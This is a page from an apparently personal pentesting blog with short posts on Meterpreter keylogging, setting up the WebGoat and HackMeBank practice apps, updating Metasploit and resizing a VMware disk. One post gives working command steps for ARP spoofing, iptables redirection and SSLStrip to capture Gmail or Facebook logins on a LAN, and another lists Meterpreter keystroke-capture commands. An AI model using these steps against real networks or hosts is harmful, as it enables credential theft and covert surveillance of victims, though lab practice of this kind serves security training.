RSS
 

Keylogger inside Meterpreter–Metasploit

30 Jul

Once you got the meterpreter session, migrate the process to explorer.exe and type

Keyscan_start – to start the keylogger
Keyscan_dump – to print captured keystrokes

 
No Comments

Posted by satishb3

 

WebGoat in Samurai

18 Jul

Samurai is a web application pentesting framework which comes with all the necessary tools.

> Open Samurai
> Open firefox
> Navigate to http://localhost:8080/webgoat/attack
> Username and password are guest
> Click start webgoat button

 
1 Comment

Posted by satishb3

 

HackMeBank on – windows XP

16 Jul

HackMeBank is a sample application where you can practice/test your hacking skills. To know how to setup hackmebank on your windows XP visit -
http://www.pingtrip.com/weblog/2008/09/installing-hacme-bank-on-xp-pro

Following the steps mentioned in the above link will allow you to run Hackmebank on SQL server 2000 express edition. If you have a latest SQL server, you can point the Hackmebank by editing the web.config file.

To run HackMeBank on SQL server 2008, install SQL server instead of SQL 2000 express. Navigate to HacmeBank_v2_WS folder and open web.config, provide SQL server 2008 username and password.

<add key=”FoundStone_Connection” value=”Server=(local);Database=FoundStone_Bank;User Id=Username;password=password“/>

To run HackMeBank in a new port, navigate to HacmeBank_v2_Website folder, open web.config and change the below value

<add key=”ipAddressOfWebService” value=”127.0.0.1:port number“/>

 
1 Comment

Posted by satishb3

 

Steal credentials in LAN – SSLStrip

24 May

SSLStrip can be used to steal gmail, facebook… (any https site) credentials in LAN. Backtrack comes with a pre-installed SSLStrip.

Below steps explain the usage of SSLStrip to steal the credentials.
Attacker: Backtrack 4 linux machine
Victim: windows xp machine  

On Backtrack 4 terminal,

  • echo 1 > /proc/sys/net/ipv4/ip_forward
  • iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
  • arpspoof -i eth0 -t victimip routerip

On other terminal:

  • sslstrip -l 1000

If you are using Backtrack 5, then do the following to start SSLStrip.

  • Go to start->info gathering->web app tools->ssl analysys->sslstrip
  • chmod +x sslstrip.py
  • Python sslstrip.py -l 1000

Now in windows xp machine, open a browser (IE). Type gmail and hit cntrl+enter.

Type username and password to log into your gmail.

By this time SSLStrip captures the credentials and stores it in sslstrip.log file. To view the log

On backtrack terminal:

  • cat sslstrip.log
To understand it in a better way watch this video -
 
8 Comments

Posted by satishb3

 

Update metasploit on backtrack

04 May

To  update the existing metasploit, in the backtrack terminal type
> msfupdate           (or)
>svn update /petnest/exploits/framework3 (or)

>sudo bash
>cd /opt/framework3/msf3/
>svn update
To remove metasploit from backtrack,
> apt-get purge framework3

To install the updated version,
> apt-get update && apt-get install framework3
If you notice the following error during up-gradation,  use the steps mentioned below.

“svn: /opt/framework/common/lib/libssl.so.0.9.8: no version information available (required by /opt/framework/common/lib/libserf-0.so.0)
svn: /opt/framework/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/framework/common/lib/libserf-0.so.0)”

> cd /opt/framework/common/lib
> mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b
> mv libssl.so.0.9.8 libssl.so.0.9.8-backup
> ln -s /usr/lib/libcrypto.so.0.9.8
> ln -s /usr/lib/libssl.so.0.9.8
> msfupdate

[Update - August 31, 2012]

Backtrack 5r1,
To uninstall existing  metasploit -
> cd /opt/framework/
> ./uninstall

To install the latest version of metasploit -
> apt-get update
> apt-get install metasploit

 
2 Comments

Posted by satishb3

 

increasing size of VMWare harddisk

10 Mar

Make sure that your VM does not have any snapshots. If  you a snapshot then create a clone of the VM and run the following command.

c:Program filesVirtual machinevmworkstationsvmware-vdiskmanager -x sizeGB file.vmdk
 
No Comments

Posted by satishb3

 
Page 10 of 11« First...7891011